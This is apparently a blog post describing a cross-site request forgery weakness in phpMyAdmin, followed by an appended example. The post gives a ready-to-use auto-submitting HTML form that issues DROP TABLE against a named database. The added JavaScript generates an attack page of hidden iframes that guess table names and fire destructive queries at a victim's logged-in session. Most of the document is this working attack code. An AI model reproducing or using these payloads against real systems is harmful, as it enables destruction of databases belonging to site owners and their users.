OK, I could not resist posting this.
I played around with phpMyAdmin a moment ago. I never gave it much thought, since it bores me too quickly, but this is kind of interesting. I have two different instances of phpMyAdmin running for testing purposes, and it is interesting to see that almost nobody understands CSRF and its capabilities, including the phpMyAdmin developers. I mean, this stuff is hilarious. First off, when you sign in to phpMyAdmin it looks like it sets a token, because the URL reads:
foo.php?token=md5thingy
Secure, right?
Well, I am not sure what they are doing there, but removing the token doesn't make any difference; it just continues to work. So I emptied the cookie, to no avail: I am still logged in. This means it uses a plain PHP session, and that way it's vulnerable to CSRF: I can do anything at will if someone visits my special web page while still logged into phpMyAdmin.
But of course, it gets worse.
How about truncating a table, or just dropping a table, through CSRF? It only requires the victim to be logged into their phpMyAdmin, or to still be within the 24-minute PHP session window. We can craft a special page that submits itself in an iframe. But the most shocking thing is that phpMyAdmin puts the query that truncates a table inside a form field. It is done like this:
<input type="hidden" value="TRUNCATE+TABLE+`test`" name="sql_query"/>
Ugh.
So this means I can put anything I like in there? Of course we can:
<!-- Auto-submitting CSRF form: every hidden field mirrors what phpMyAdmin's own drop-confirmation page posts -->
<form method="post" action="http://www.example.com/phpMyAdmin/sql.php">
<input type="hidden" value="en-utf-8" name="lang"/>
<input type="hidden" value="1" name="server"/>
<input type="hidden" value="utf8_general_ci" name="collation_connection"/>
<input type="hidden" value="w0rdpr3ss" name="db"/>
<input type="hidden" value="users" name="table"/>
<!-- The server takes the SQL to run straight from this field -->
<input type="hidden" value="DROP+TABLE+`users`" name="sql_query"/>
<input type="hidden" value="Table has been emptied" name="zero_rows"/>
<input type="hidden" value="tbl_properties_structure.php" name="goto"/>
<input type="hidden" value="tbl_properties_structure.php" name="back"/>
<input type="hidden" value="0" name="reload"/>
<input type="hidden" value="" name="purge"/>
<input type="hidden" value="" name="cpurge"/>
<input type="hidden" value="" name="purgekey"/>
<input type="hidden" value="" name="show_query"/>
<input id="buttonYes" type="submit" value="Yes" name="btnDrop"/>
<input id="buttonNo" type="submit" value="No" name="btnDrop"/>
</form>
<!-- click() the Yes button instead of calling form.submit(): a submit button has no submit() method, and only a clicked button contributes its btnDrop=Yes pair -->
<script>document.getElementById('buttonYes').click();</script>
Since a standard PHP session usually lasts 24 minutes, attackers can hit anyone even after you close your phpMyAdmin session. Much more is possible, probably very fancy stuff. Yes, you need to know the table name to pull this off, but how about putting 200 hidden iframes in our victim page that guess table names? Or just reloading the iframe with different table names for about five minutes if you do not know the table name? I am sure one of them will be right! And I would not be surprised if GET works too :)
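The multi-iframe guessing page sketched above, written out as an added example (this is not code from the original post, nor phpMyAdmin's own code). It assumes the same sql.php endpoint and field names the form above uses; the target URL, database name and the list of guessed table names are constructed assumptions, and the query is sent with literal spaces rather than the +-encoded form shown above, which is an assumption about what the server expects. Each guess gets its own hidden iframe and its own form, so the victim's page never visibly navigates, and the forms are triggered by clicking their Yes button so that btnDrop=Yes is included in the POST.

```javascript
// Added example: generate a CSRF page with one hidden iframe per guessed
// table name. Not phpMyAdmin code; every value below is an assumption.

const TARGET = 'http://www.example.com/phpMyAdmin/sql.php'; // assumed victim URL
const DB = 'w0rdpr3ss';                                     // assumed database
// Constructed guess list; a real page would carry the "200 hidden iframes".
const TABLE_GUESSES = ['users', 'wp_users', 'wp_posts', 'wp_options'];

// Escape attribute values so a guessed name cannot break out of the markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Hidden fields mirroring phpMyAdmin's drop-confirmation form; only db,
// table and sql_query change from guess to guess. Backticks inside the
// guessed name are doubled so the generated SQL stays a single identifier.
function csrfFields(db, table) {
  return {
    lang: 'en-utf-8',
    server: '1',
    collation_connection: 'utf8_general_ci',
    db,
    table,
    sql_query: 'DROP TABLE `' + table.replace(/`/g, '``') + '`',
    goto: 'tbl_properties_structure.php',
    back: 'tbl_properties_structure.php',
    reload: '0',
  };
}

// One form per guess, posted into its own hidden iframe via target=, so the
// response (error page or success page) is swallowed silently.
function buildForm(target, db, table, index) {
  const frame = 'f' + index;
  const inputs = Object.entries(csrfFields(db, table))
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join('\n');
  return [
    `<iframe name="${frame}" style="display:none"></iframe>`,
    `<form id="form${index}" method="post" action="${escapeHtml(target)}" target="${frame}">`,
    inputs,
    // The clicked submit button supplies btnDrop=Yes; form.submit() would omit it.
    `<input type="submit" name="btnDrop" value="Yes" id="btn${index}">`,
    '</form>',
  ].join('\n');
}

// Assemble the full attack page: all forms, then a script that clicks every
// Yes button once the markup is in the DOM.
function buildCsrfPage(target, db, tables) {
  const forms = tables.map((t, i) => buildForm(target, db, t, i)).join('\n');
  const trigger = tables
    .map((_, i) => `document.getElementById('btn${i}').click();`)
    .join('\n');
  return `<!doctype html>\n<html><body>\n${forms}\n<script>\n${trigger}\n</script>\n</body></html>`;
}

const PAGE = buildCsrfPage(TARGET, DB, TABLE_GUESSES);

// Running under Node prints the page that would be served to the victim.
if (typeof document === 'undefined') {
  console.log(PAGE);
}
```

The same generator covers the "reload the iframe for five minutes" variant: keep a single iframe and form, and have the trigger script rewrite the table and sql_query fields and click again on a timer instead of emitting one form per guess.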